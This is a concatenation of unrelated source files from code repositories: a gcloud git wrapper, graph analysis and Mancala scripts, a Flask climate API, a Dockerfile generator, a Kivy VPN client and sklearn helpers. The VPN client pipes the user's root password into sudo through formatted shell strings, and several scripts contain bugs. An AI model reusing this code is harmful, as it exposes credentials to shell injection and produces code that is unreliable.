8bd3e7c8d668cfc74846117b6febfca47c28fc71 | 3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be | /google-cloud-sdk/lib/googlecloudsdk/shared/source/git.py | ee124d0731c0133d6e31483c44d56b4db9f1f8c3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | twistedpair/google-cloud-sdk | 37f04872cf1ab9c9ce5ec692d2201a93679827e3 | 1f9b424c40a87b46656fc9f5e2e9c81895c7e614 | refs/heads/master | 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 | Python | UTF-8 | Python | false | false | 9,823 | py | # Copyright 2015 Google Inc. All Rights Reserved.
"""Wrapper to manipulate GCP git repository."""
import errno
import os
import re
import subprocess
import textwrap
from googlecloudsdk.core import log
from googlecloudsdk.core.util import compat26
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
import uritemplate
# This regular expression is used to extract the URL of the 'origin' remote by
# scraping 'git remote show origin'.
_ORIGIN_URL_RE = re.compile(r'remote origin\n.*Fetch URL: (?P<url>.+)\n', re.M)
# This is the minimum version of git required to use credential helpers.
_HELPER_MIN = (1, 7, 9)
class Error(Exception):
"""Exceptions for this module."""
class UnknownRepositoryAliasException(Error):
"""Exception to be thrown when a repository alias provided cannot be found."""
class CannotInitRepositoryException(Error):
"""Exception to be thrown when a repository cannot be created."""
class CannotFetchRepositoryException(Error):
"""Exception to be thrown when a repository cannot be fetched."""
class GitVersionException(Error):
"""Exceptions for when git version is too old."""
def __init__(self, fmtstr, cur_version, min_version):
super(GitVersionException, self).__init__(
fmtstr.format(cur_version=cur_version, min_version=min_version))
class InvalidGitException(Error):
"""Exceptions for when git version is empty or invalid."""
def __init__(self, message):
super(InvalidGitException, self).__init__(message)
class MissingCredentialHelper(Error):
"""Exception for when the gcloud credential helper cannot be found."""
def __init__(self, message):
super(MissingCredentialHelper, self).__init__(message)
def CheckGitVersion(version_lower_bound=None):
"""Returns true when version of git is >= min_version.
Args:
version_lower_bound: (int,int,int), The lowest allowed version, or None to
just check for the presence of git.
Returns:
True if version >= min_version.
Raises:
GitVersionException: if `git` was found, but the version is incorrect.
InvalidGitException: if `git` was found, but the output of `git version` is
not as expected.
NoGitException: if `git` was not found.
"""
try:
output = compat26.subprocess.check_output(['git', 'version'])
if not output:
raise InvalidGitException('The git version string is empty.')
if not output.startswith('git version '):
raise InvalidGitException(('The git version string must start with '
'git version .'))
match = re.search(r'(\d+)\.(\d+)\.(\d+)', output)
if not match:
raise InvalidGitException('The git version string must contain a '
'version number.')
cur_version = match.group(1, 2, 3)
current_version = tuple([int(item) for item in cur_version])
if version_lower_bound and current_version < version_lower_bound:
min_version = '.'.join(str(i) for i in version_lower_bound)
raise GitVersionException(
('Your git version {cur_version} is older than the minimum version '
'{min_version}. Please install a newer version of git.'),
output, min_version)
except OSError as e:
if e.errno == errno.ENOENT:
raise NoGitException()
raise
return True
class NoGitException(Error):
"""Exceptions for when git is not available."""
def __init__(self):
super(NoGitException, self).__init__(
textwrap.dedent("""\
Cannot find git. Please install git and try again.
You can find git installers at [http://git-scm.com/downloads], or use
your favorite package manager to install it on your computer. Make sure
it can be found on your system PATH.
"""))
def _GetRepositoryURI(project, alias):
"""Get the URI for a repository, given its project and alias.
Args:
project: str, The project name.
alias: str, The repository alias.
Returns:
str, The repository URI.
"""
return uritemplate.expand(
'https://source.developers.google.com/p/{project}/r/{alias}',
{'project': project, 'alias': alias})
def _GetCredentialHelper():
"""Get a path to the credential helper.
Tries to find the credential helper installed with this version of gcloud.
If the credential helper is not in PATH, it throws an error instructing the
user to add the Cloud SDK on PATH. If the helper is in PATH, it returns the
relative git suffix for the helper. Git adds the 'git-credential-' prefix
automatically.
Returns:
str, credential helper command name without 'git-credential-' prefix
Raises:
MissingCredentialHelper: if the credential helper cannot be found
"""
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
helper_ext = '.cmd'
else:
helper_ext = '.sh'
helper_name = 'gcloud'
helper_prefix = 'git-credential-'
helper = files.FindExecutableOnPath(helper_prefix + helper_name,
pathext=[helper_ext])
if not helper:
raise MissingCredentialHelper(
'Could not find gcloud\'s git credential helper. '
'Please make sure the Cloud SDK bin folder is in PATH.')
return helper_name + helper_ext
class Git(object):
"""Represents project git repo."""
def __init__(self, project_id, repo_name, uri=None):
"""Clone a repository associated with a Google Cloud Project.
Looks up the URL of the indicated repository, and clones it to alias.
Args:
project_id: str, The name of the project that has a repository associated
with it.
repo_name: str, The name of the repository to clone.
uri: str, The URI of the repository to clone, or None if it will be
inferred from the name.
Raises:
UnknownRepositoryAliasException: If the repo name is not known to be
associated with the project.
"""
self._project_id = project_id
self._repo_name = repo_name
self._uri = uri or _GetRepositoryURI(project_id, repo_name)
if not self._uri:
raise UnknownRepositoryAliasException()
def GetName(self):
return self._repo_name
def Clone(self, destination_path):
"""Clone a git repository into a gcloud workspace.
If the resulting clone does not have a .gcloud directory, create one. Also,
sets the credential.helper to use the gcloud credential helper.
Args:
destination_path: str, The relative path for the repository clone.
Returns:
str, The absolute path of cloned repository.
Raises:
CannotInitRepositoryException: If there is already a file or directory in
the way of creating this repository.
CannotFetchRepositoryException: If there is a problem fetching the
repository from the remote host, or if the repository is otherwise
misconfigured.
"""
abs_repository_path = os.path.abspath(destination_path)
if os.path.exists(abs_repository_path):
CheckGitVersion() # Do this here, before we start running git commands
# First check if it's already the repository we're looking for.
with files.ChDir(abs_repository_path) as _:
try:
output = compat26.subprocess.check_output(
['git', 'remote', 'show', 'origin'])
except subprocess.CalledProcessError:
raise CannotFetchRepositoryException(
'Repository in [{path}] is misconfigured.'.format(
path=abs_repository_path))
output_match = _ORIGIN_URL_RE.search(output)
if not output_match or output_match.group('url') != self._uri:
raise CannotInitRepositoryException(
('Repository [{url}] cannot be cloned to [{path}]: there'
' is something already there.').format(
url=self._uri, path=abs_repository_path))
else:
# Repository exists and is correctly configured: abort.
log.err.Print(
('Repository in [{path}] already exists and maps to [{uri}].'
.format(path=abs_repository_path, uri=self._uri)))
return None
# Nothing is there, make a brand new repository.
try:
if (self._uri.startswith('https://code.google.com') or
self._uri.startswith('https://source.developers.google.com')):
# If this is a Google-hosted repo, clone with the cred helper.
try:
CheckGitVersion(_HELPER_MIN)
except GitVersionException:
log.warn(textwrap.dedent("""\
You are cloning a Google-hosted repository with a version of git
older than 1.7.9. If you upgrade to 1.7.9 or later, gcloud can
handle authentication to this repository. Otherwise, to
authenticate, use your Google account and the password found by
running the following command.
$ gcloud auth print-refresh-token
"""))
cmd = ['git', 'clone', self._uri, abs_repository_path]
log.debug('Executing %s', cmd)
subprocess.check_call(cmd)
else:
cmd = ['git', 'clone', self._uri, abs_repository_path,
'--config',
'credential.helper="{0}"'.format(_GetCredentialHelper())]
log.debug('Executing %s', cmd)
subprocess.check_call(cmd)
else:
# Otherwise, just do a simple clone. We do this clone, without the
# credential helper, because a user may have already set a default
# credential helper that would know the repo's auth info.
subprocess.check_call(
['git', 'clone', self._uri, abs_repository_path])
except subprocess.CalledProcessError as e:
raise CannotFetchRepositoryException(e)
return abs_repository_path
| [
"joe@longreen.io"
] | joe@longreen.io |
15732a57f132ed2f8ccbd8946e4896179e207627 | 84bd3c9ae988defff60b8a8bb080ddfe983dd03e | /code/misc.py | 0a44427a3cde1a53e9da8d133d1f8ee5dc3ba2bf | [] | no_license | ashwanikhemani/CRF | de5fed8e99db72c412710fabc2323874b3358034 | 568eb654db2fd08e1b30fb2078288e01a3afccc9 | refs/heads/master | 2020-03-22T08:32:00.435747 | 2018-09-23T17:58:09 | 2018-09-23T17:58:09 | 139,772,256 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #the orphaned functions that don't belong anywhere
def print_image(X):
#prints an image, if it is in a list
for i in range(16):
print(X[8*i:8*i+8])
| [
"gmarat19@gmail.com"
] | gmarat19@gmail.com |
e860c0e792bd935c6f3dca00e8a1702e2609fa78 | 6f3a4ec0cb18aea374d130d4d2af4ccaad59f508 | /label_prop_tab1.py | 32dc81a42aaabb82784fc022be6048a787740368 | [] | no_license | AlessiaWent/Community-detection | a2786ce795b70bfc40f3202233f72ef3fdc4a906 | e4b12d7b6418f88b50a7a774e1c6677cbf97b0f8 | refs/heads/master | 2021-01-17T20:35:29.959860 | 2016-12-15T17:33:18 | 2016-12-15T17:33:18 | 68,443,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,357 | py | #The program reads a file containing the edges and corresponding weights, performs label propagation and outputs Table 1
#Usage: ./label_prop_tab1.py cftable nproc edges_file output_file
import codecs
from igraph import *
import time
from point_mix import Point
import random
import multiprocessing
from multiprocessing import Process
from Queue import Empty
from multiprocessing import Queue
from multiprocessing.managers import SyncManager
from functools import partial
import sys
import logging
#Computes the measures required for Table 1 for communities from beg to end
def writeslice1(beg,end,g,cfed_rev,que):
result = []
subs = [g.induced_subgraph([v for v in g.vs() if v["group"] == k-1]) for k in range(beg,end)]
for ind in range(beg,end):
sub = subs[ind-beg]
if sub.vcount() > 1:
evcent = sub.evcent()
prank = sub.pagerank()
closeness = sub.closeness()
betweenness = sub.betweenness()
for v in sub.vs():
deg = sub.degree(v)
i = v["name"]
result.append(cfed_rev[i]+","+i+","+str(ind-1)+","+str(deg)+","+str(deg/float(sub.vcount()))+","+str(closeness[sub.vs.find(i).index])+","+str(betweenness[sub.vs.find(i).index])+','+str(evcent[v.index])+','+str(prank[v.index])+"\n")
que.put(result)
if len(sys.argv) <2:
print 'please provide me input file'
sys.exit()
if len(sys.argv) <3:
print 'please provide me number of processors'
sys.exit()
t_zero = time.time()
#reads the table containing ID_SOGGETTO and ID_CF for each node in the wanted subset of the dataset
cfed = {}
cfed_rev = {}
cf = open(sys.argv[1], 'r')
for line in cf:
line = line.strip().split(' ')
cfed[line[0]] = line[1]
cfed_rev[line[1]] = line[0]
cf.close()
print "reading all needed data"
print " complete reading dataset"
print 'initialization time (including reading data ) =', time.time() - t_zero
g = Graph()
g.add_vertices(cfed.values())
nproc = int(sys.argv[2])
n = len(cfed)
edges = []
weights = []
s = time.time()
edg = open(sys.argv[3], 'r')
for line in edg:
k = line.strip().split('\t')
edges.append((k[0], k[1]))
g.add_edges(edges)
g.simplify()
to_remove = g.vs.select(_degree = 0)
g.delete_vertices(to_remove)
g.es["weight"] = weights
print 'Time to copy edges =', time.time() - s
random.seed(1234)
comm = g.community_label_propagation(weights = g.es["weight"])
g.vs["group"] = comm.membership
print '#clusters with more than 1 element: ', len([i for i in comm if len(i) > 1])
print '\n'
f = Queue()
out = time.time()
other_results = []
nclu = max(comm.membership) + 2
step = nclu/nproc
if nclu%nproc > 0:
step += 1
for proc_num in range(nproc):
beg = proc_num*step
end = min((proc_num+1)*step,nclu-1)
proc = Process(target=writeslice1, args=[beg,end,g, cfed_rev,f])
proc.start()
print 'proc_num ='+str(proc_num)
while len(other_results)< nproc:
print str(len(other_results))+'processes'
other_results.append(f.get())
#writes results in output file
tab = open(sys.argv[4], 'w')
tab.write('ID_SOGGETTO,ID_CF,ID_COMMUNITY,DEGREE,NORM_DEGREE,CLOSENESS,BETWEENNESS,EIG_CENTRALITY,PAGERANK\n')
for r in other_results:
for k in r:
tab.write(k)
tab.close()
print 'OT ='+str(time.time() - out)
print 'TT ='+str(time.time() - t_zero)
| [
"alexwent91@gmail.com"
] | alexwent91@gmail.com |
b5f225109cb48bec4a6038fd921fb471c7247f55 | 01fd020808e9bb2af4f47ca081c73f8328aab8b0 | /Mancala/Testselbstspielen.py | 27dabba8c13c1090e6674d6e65ca55fdad1ab61a | [] | no_license | JojoB96/Neuronale-Netze | 0d077e87510c3b13ea15bd7c3cf652e6bf3566f1 | 3401e3bd10d8ffd0d4fde6c3053fdd7669747949 | refs/heads/master | 2022-12-08T10:36:45.423260 | 2020-09-04T11:36:45 | 2020-09-04T11:36:45 | 271,476,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 15 14:15:22 2020
@author: johanna
"""
import numpy as np
import mancala as m
ma = m.Mancala(exploration_rate = 0.2)
print("Start")
print(ma.net.biases)
print(ma.spielfeld[0:12])
#ma.train_net(500,25,1)
print("trained")
#print(ma.play())
print('play gegen Random')
matest = m.Mancala(exploration_rate = 0.2)
matest.net.load_network_from_files("Test")
Spieler1gewonnen = 0
Spieler2gewonnen = 0
unentschieden = 0
for i in range (1,1):
#print(i)
while not(np.array_equal(matest.spielfeld[0:6] ,[0,0,0,0,0,0]) or np.array_equal(matest.spielfeld[6:12] ,[0,0,0,0,0,0])): # muesste es nicht ausreichen zu ueberpruefen, ob die schatzmulden mehr als die haelfte der Kugeln beinhalten? ( also self.spielfeld[12] > 36 or also self.spielfeld[13] > 36
# das geht nicht, zum Gewinn zählen noch die Bohnen auf dem Feld
#while not(matest.spielfeld[12]>36 or matest.spielfeld[13]>36 or (matest.spielfeld[12] == 36 and matest.spielfeld[13] == 36)):
#Spieler 1 netz
feld = matest.get_next_action(matest.spielfeld)
matest.spielfeld, reward = matest.get_spielfeld_and_reward_after_action(matest.spielfeld, feld)
#selbst( spieler 2)
matest.spieler1 = not matest.spieler1
print(matest.spielfeld)
mulde = input("Eingabe: int zwischen 6 und 11")
mulde = mulde-6
#print(mulde)
#print(matest.spielfeld)
matest.spielfeld, reward = matest.get_spielfeld_and_reward_after_action(matest.spielfeld, mulde)
matest.spieler1 = not matest.spieler1
# matest.get_turned_spielfeld(matest.spielfeld)
# print(matest.spielfeld)
#check who won
if matest.spielfeld[12] > 36:
Spieler1gewonnen += 1
elif matest.spielfeld[13] > 36:
Spieler2gewonnen += 1
elif matest.spielfeld[12] == 36 and matest.spielfeld[13] == 36:
unentschieden += 1
#else:
# print(matest.spielfeld[0:6])
# print(matest.spielfeld[6:12])
matest.reset()
print("Netz", Spieler1gewonnen/100, "%")
print("Random", Spieler2gewonnen/100, "%")
print("unentschieden", unentschieden/100, "%")
| [
"johbeier@hotmail.de"
] | johbeier@hotmail.de |
ba44833508e64f5a05861a52410e91f082a08777 | bb0094791dd4c6f19bfbdfc342bfaec58f4ee04a | /SurfOnVpn/surfOnVpn.py | 540d3721e6afefc20184973be5650b454692c66f | [
"MIT"
] | permissive | prabhakar1998/SurfOnVpn | 6e74866cda22b12f940bd653ff0f806189fca5f5 | 74b8e28255e85a073300680475c9053407865904 | refs/heads/master | 2021-09-13T04:48:26.623150 | 2018-04-25T04:28:37 | 2018-04-25T04:28:37 | 115,930,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,089 | py | """Application File, This file is the main file to run.
Usage python3 surfOnVpn
Dependencies in setup.py file
"""
from threading import Thread
from os import system, popen
import subprocess as sub
from vpn import Vpn
from kivy.config import Config
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.lang import Builder
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
Config.set('graphics', 'minimum_width', '570')
Config.set('graphics', 'minimum_height', '600')
__author__ = "Prabhakar Jha"
__copyright__ = "Copyright (c) 2018 Prabhakar Jha"
__credits__ = ["Prabhakar Jha"]
__license__ = "MIT License"
__version__ = "1.0.0"
__maintainer__ = "Prabhakar Jha"
__email__ = "findmebhanujha@gmail.com"
global settings_menu
aboutus = '[font=RobotoMono-Regular] Hey there, I am Prabhakar Jha.\n'\
' Young and passonate guy who loves to \n solve challengin problem.'\
'\n This project was initiated to have a \n UI based proper free '\
' and open source VPN \n Software.\n This software is for '\
' educational purpose only.\n Any illegal use of this '\
' software is\n strictly prohibitted!. \n\n '\
' Contact me : [u]findmebhanujha@gmail.com [/u]\n[/font]'
contribute = '[font=RobotoMono-Regular] Liked my work.\n'\
' Great! you can also contribute to this project \n at'\
' the following link.\n\n '\
' [u]https://github.com/prabhakar1998/SurfOnVpn\n[/u][/font]'
install_requirements = ""
report_issue = "[font=RobotoMono-Regular]Contact Developer: "\
"[u]findmebhanujha@gmail.com[/u][/font]"
neeed_help = "[font=RobotoMono-Regular]Contact Developer: "\
" [u]findmebhanujha@gmail.com[/u][/font]"
settings_menu = {
"About Us": aboutus,
"Contribute": contribute,
"Install Requirements": install_requirements,
"Report An Issue": report_issue,
"Need Help": neeed_help}
class StartScreen(Screen):
"""Initial screen where the user gives root password."""
def verify_password(self, password_arg):
"""Function verifies if the root password is correct or not."""
global password
if password_arg == "":
popup = Popup(title='No Password Entered',
content=Label(text="Please Enter The Password"),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
else:
# check for root password
# if the root password is correct then
password = password_arg
op = popen("echo {} | sudo -S ifconfig".format(password)).read()
if op == "":
popup = Popup(title='Incorrect Password',
content=Label(markup=True,
text='[i]Double check password and try again.[/i]'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
else:
self.parent.current = "SurfOnVpn"
class SurOnVpnLayout(Screen, GridLayout):
"""Main screen of the application and its related functions."""
def update_screen(self, level):
"""
Function updates the Status of connection on screen.
Usage:
update_screen(level):
if level = -1 : Disconneted, level = 0 Connecting,
level = 1 Connected, level = 2 Intalling
"""
if level == -1:
self.ids.status.text = "Disconnected"
self.ids.connect_button.text = "Connect"
self.ids.connecting_gif.opacity = 0
self.ids.connect_button.background_color = 0, 1, 0, 1
elif level == 0:
self.ids.connecting_gif.opacity = 1
self.ids.connect_button.text = "Connecting..."
self.ids.connect_button.background_color = 204 / 225, 0,
elif level == 1:
self.ids.status.text = "Connected"
self.ids.connect_button.background_color = 1, 0, 0, 1
self.ids.connecting_gif.opacity = 0
self.ids.connect_button.text = "Disconnect"
elif level == 2:
self.ids.status.text = "Installing Requirements"
self.ids.connect_button.background_color = 1, 1, 0, 1
self.ids.connecting_gif.opacity = 0
self.ids.connect_button.text = "Installing...."
def install_requirements(self):
"""It installs the openvpn."""
if self.check_packages() == 0:
popup = Popup(title='Requirements Already Satishfied',
content=Label(markup=True,
text='[font=RobotoMono-Regular]Requirements Already Satishfied. \nTry connecting to any server...[/font]'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
else:
system("echo {} | sudo -S apt-get update".format(password))
system("echo {} | sudo -S apt-get install openvpn".format(password))
if self.check_packages() != 0:
popup = Popup(title='Failed To Install',
content=Label(markup=True,
text='Failed to intall\n Try running [u]sudo apt-get update[/u].'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
self.update_screen(-1)
def settings(self, text):
"""All the functions related to settings is here."""
global settings_menu, password
if text == "Install Requirements":
Thread(target=self.install_requirements).start()
self.update_screen(2)
# check if installed if yes tell if not tell
elif text != "Settings":
popup = Popup(title=text,
content=Label(markup=True, text=settings_menu[text]),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350),
)
popup.open()
def connect(self):
"""Connecting to the selected profile."""
global password
self.vpn = Vpn(password)
self.vpn.SELECTED_PROFILE = self.ids.spinner_id.text
self.vpn.SELECTED_PROFILE_URL = self.vpn.\
LIST_URL_VPNBOOK_PROFILES[self.vpn.SELECTED_PROFILE]
status = self.vpn.download_profile()
if status == -1:
# No internet connection!!!
popup = Popup(title='NO Internet Connection',
content=Label(text='Please Check If You Have A Working Internet Connection.'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
self.update_screen(-1)
else:
if self.vpn.connect_profile() == -1:
self.update_screen(-1)
popup = Popup(title='Failed',
content=Label(text='Failed to connect. Try connecting with different server.'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
else:
self.update_screen(1)
def check_packages(self):
"""
It Checks if the requirements are satishfied.
The application requires the OpenVpn so if its not installed then the
installation information is provided to user.
"""
process = sub.Popen(["dpkg", "-s", "openvpn"],
stdout=sub.PIPE, stderr=sub.PIPE)
output, errors = process.communicate()
output = output.decode('utf-8')
for i in output.splitlines():
if "Status" in str(i):
if "installed" in str(i):
return 0
def connect_button(self, value):
"""It gets executed when the connect button is clicked."""
if value == "Connect":
# currently disconnected ...
if self.check_packages() == 0:
if self.ids.spinner_id.text == "Select Server":
popup = Popup(title='Oops, You are here!',
content=Label(
text='Please Select Any Server!!'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
else:
self.update_screen(0)
Thread(target=self.connect).start()
else:
popup = Popup(title='Requirements Missing',
content=Label(text='Go to settings and click on Install Requirements'),
auto_dismiss=True,
size_hint=(None, None),
size=(540, 350))
popup.open()
elif value == "Connecting...":
pass
elif value == "Disconnect":
self.vpn.disconnect()
self.update_screen(-1)
class ScreenManagement(ScreenManager):
"""It helps in the transition from StartScreen to SurOnVpnLayout."""
pass
presentation = Builder.load_file('surfOnVpn.kv')
class Application(App):
"""Application initializer class."""
def build(self):
"""Initializing app."""
self.title = "SurfOnVpn"
self.icon = "setting.png"
return presentation
app = Application()
app.run()
| [
"findmebhanujha@gmail.com"
] | findmebhanujha@gmail.com |
821692c00f4beae20681d0ca24a85d51f8daeaff | fda2cc97a3f0cb5598ff4d53f599cd5eedca6dc5 | /src/models/ml_model.py | 05a9f8f0f25b2a5f3c1f472ba37aa36768eba9b9 | [
"MIT"
] | permissive | sboomi/cp1 | a1f16e1c617708b9bc453137ccf485d253938c87 | 7f7aa96e8ba9cfe00802028a61bfba5e90c999f6 | refs/heads/main | 2023-04-27T14:30:09.093654 | 2021-04-30T20:56:05 | 2021-04-30T20:56:05 | 344,061,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import numpy as np
from typing import Dict, Any, Tuple
from sklearn.base import BaseEstimator
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import SVC
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import LogisticRegression
def generate_best_model(model_name: str,
X: np.ndarray,
y: np.ndarray) -> BaseEstimator:
"""Fetches a model from the model list and runs a grid search
CV on it. Returns the best model with the best score.
Models available:
* SVM: `svm`
* Naive Bayes: `naive_bayes`
* Logistic regression: `lr`
Args:
model_name (str): name of the model
X (np.ndarray): The data with features
y (np.ndarray): The labels
Returns:
BaseEstimator: Best version of the model
"""
model_list = {
"svm": BestSVM(),
"naive_bayes": BestNaiveBayes(),
'lr': BestLogisticRegression()
}
model = model_list[model_name]
return model.fit_best_model(X, y)
class BestModel:
"""Base class for text models
"""
def __init__(self):
self.model: BaseEstimator = None
self.name: str = ""
self.params: Dict[str, Any] = {}
def fit_best_model(self,
X: np.ndarray,
y: np.ndarray) -> Tuple[BaseEstimator, float]:
gs_cv = GridSearchCV(self.model, self.params, cv=5)
gs_cv.fit(X, y)
return gs_cv.best_estimator_, gs_cv.best_score_
def __str__(self):
return f"{self.name}\nN° of params: {len(self.params.keys())}"
class BestSVM(BestModel):
def __init__(self):
super().__init__()
self.model = make_pipeline(TfidfVectorizer(), SVC())
self.name = SVC().__class__.__name__
self.params = {"svc__C": np.logspace(0, 5, 10),
'svc__gamma': np.logspace(-6, 0, 10),
'svc__kernel': ["linear", "rbf"]}
class BestNaiveBayes(BestModel):
def __init__(self):
super().__init__()
self.model = make_pipeline(TfidfVectorizer(), MultinomialNB())
self.name = MultinomialNB().__class__.__name__
self.params = {"multinomialnb__alpha": np.linspace(0, 1, 20)}
class BestLogisticRegression(BestModel):
def __init__(self):
super().__init__()
self.model = make_pipeline(TfidfVectorizer(), LogisticRegression())
self.name = MultinomialNB().__class__.__name__
self.params = {"logisticregression__C": np.logspace(-4, 5, 20),
"logisticregression__penalty": ["l1", "l2"]}
| [
"shadi.boomi@gmail.com"
] | shadi.boomi@gmail.com |
994e88ad0fb61fca619824198737c810bcf2abc8 | b4d84e260df6df98dd20087ef28b185f1e232515 | /climate.py | 039303c2437813220aa84bacf5384e6d15a87d2d | [] | no_license | DanBoulden/Homework_06_in_progress | e3d6a9574b42462c548b27e165a3f691d517aa7a | 9daea3d46d50dd17d88849db5fe3db40cfe277eb | refs/heads/master | 2020-04-15T01:03:24.990030 | 2019-02-06T01:58:53 | 2019-02-06T01:58:53 | 164,262,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,093 | py | import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create our session (link) from Python to the DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"Available Routes:<br/>"
f"Avalable routes:<br/>"
f"Avalable pathes = /api/v1.0<br/>"
f" /api/v1.0/Measurement<br/>"
f" /api/v1.0/Station<br/>"
f" /api/v1.0/precipitation<br/>"
f" /api/v1.0/station<br/>"
f" /api/v1.0/tob<br/>"
)
@app.route("/")
def home():
return (
f"Hi, this is the Hawaii climate site<br/>"
f"Avalable routes:<br/>"
f"Avalable pathes = /api/v1.0<br/>"
f" /api/v1.0/Measurement<br/>"
f" /api/v1.0/Station<br/>"
f" /api/v1.0/precipitation<br/>"
f" /api/v1.0/station<br/>"
f" /api/v1.0/tob<br/>"
)
@app.route("/v1.0")
def ver():
return (
f"This is the Hawaii climate site, version 1.0<br/>"
f"Avalable routes:<br/>"
f"Avalable pathes for v1.0<br/>"
f" /api/v1.0/Measurement<br/>"
f" /api/v1.0/Station<br/>"
f" /api/v1.0/precipitation<br/>"
f" /api/v1.0/stations<br/>"
f" /api/v1.0/tobs<br/>"
)
@app.route("/v1.0/Measurement")
def Measurement():
return jsonify(Measurement)
@app.route("/v1.0/Station")
def Station():
return jsonify(Station)
@app.route("/v1.0/precipitation")
def precipitation():
return(
f"This is the Hawaii climate site, version 1.0: precipitation<br/>"
f"This is still under construction<br/>"
)
@app.route("/v1.0/stations")
def stations():
return(
f"This is the Hawaii climate site, version 1.0: stations<br/>"
f"This is still under construction<br/>"
)
@app.route("/v1.0/tobs")
def tobs():
return(
f"This is the Hawaii climate site, version 1.0: tobs<br/>"
f"This is still under construction<br/>"
)
if __name__ == '__main__':
app.run(debug=True)
| [
"noreply@github.com"
] | noreply@github.com |
d42d791d901f6b9f7548b186742945a2cd24936b | 8d90cdd61cfb7f42b8ba90c0cf284add19922781 | /project/infrastracture/make_dockerfile.py | a6aaf0da60828b82ba9398b103847736e5b4f033 | [
"MIT"
] | permissive | MCYP-UniversidadReyJuanCarlos/19-20_dalobe | e64b9ce3d19fbfaceb1398884bff49790babf62f | 43b64744d8011af6ccd62fee394d6af2b11cac68 | refs/heads/master | 2021-06-28T19:59:31.794342 | 2020-08-31T16:16:25 | 2020-08-31T16:16:25 | 230,571,914 | 4 | 0 | MIT | 2021-05-06T20:22:20 | 2019-12-28T06:57:09 | CSS | UTF-8 | Python | false | false | 1,766 | py | import uuid
class Make_dockerfile:
def write_docker_file_from_dynamic(container, dockerfile_fixes):
image = container.image
f = open('output/Dockerfile', mode='wt', encoding='utf-8')
f.write("FROM " + str(image.attrs.get('RepoTags')[0]) + "\n\n")
[f.write(o['content']) for o in dockerfile_fixes]
f.close()
def write_docker_file_from_static(instructions, dockerfile_fixes):
f = open('output/Dockerfile', mode='wt', encoding='utf-8')
proposed_dockerfile_instructions = Make_dockerfile.generate_proposed_dockerfile(instructions, dockerfile_fixes)
[f.write(o['content']) for o in proposed_dockerfile_instructions]
f.close()
return proposed_dockerfile_instructions
def generate_proposed_dockerfile(instructions, dockerfile_fixes):
proposed_dockerfile_instructions = []
for instruction in instructions:
if instruction['startline'] in Make_dockerfile.get_lines_with_fixes(dockerfile_fixes):
next(proposed_dockerfile_instructions.append(o) for o in dockerfile_fixes
if 'startline' in o and o['startline'] == instruction['startline'])
else:
proposed_dockerfile_instructions.append(instruction)
[proposed_dockerfile_instructions.append(o) for o in dockerfile_fixes if 'startline' not in o]
return proposed_dockerfile_instructions
def get_lines_with_fixes(dockerfile_fixes):
return list(x['startline'] for x in dockerfile_fixes if 'startline' in x)
def write_dockerfile(dockerfile):
filename = uuid.uuid4()
temp_file = open("output/" + str(filename), "w")
temp_file.write(dockerfile)
temp_file.close()
return "output/" + str(filename)
| [
"d.lopezb.2019@alumnos.urjc.es"
] | d.lopezb.2019@alumnos.urjc.es |
5375777a1964677416c8a6d7877ffd6f6a3704fd | 8dedd4fe372a350dbf016a309c7ddd142257611e | /conejo/lib/tts.py | 189c935042d968b788b7841934a8c829e0116423 | [] | no_license | castrofernandez/raspberry-pi | 034b5277ca6a96ce3e6b03afbdd1f7a085a570b4 | f9af19c2a8e1459c5e002b10cb5de781035a98bf | refs/heads/master | 2016-09-05T18:51:21.472457 | 2015-02-08T16:31:06 | 2015-02-08T16:31:06 | 16,258,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,026 | py | #!/usr/bin/python
#-*- mode: python; coding: utf-8 -*-
import urllib, urllib2
from os import path
#from pydub import AudioSegment
def obtenerMP3(idioma, mensaje, nombre = None, ruta = None):
base = "http://translate.google.com/translate_tts"
valores = { 'q': mensaje, 'tl': idioma }
data = urllib.urlencode(valores)
peticion = urllib2.Request(base, data)
peticion.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11" )
respuesta = urllib2.urlopen(peticion)
if (nombre == None):
nombre = "_".join(mensaje.split())
#aux = nombre + ".aux.mp3"
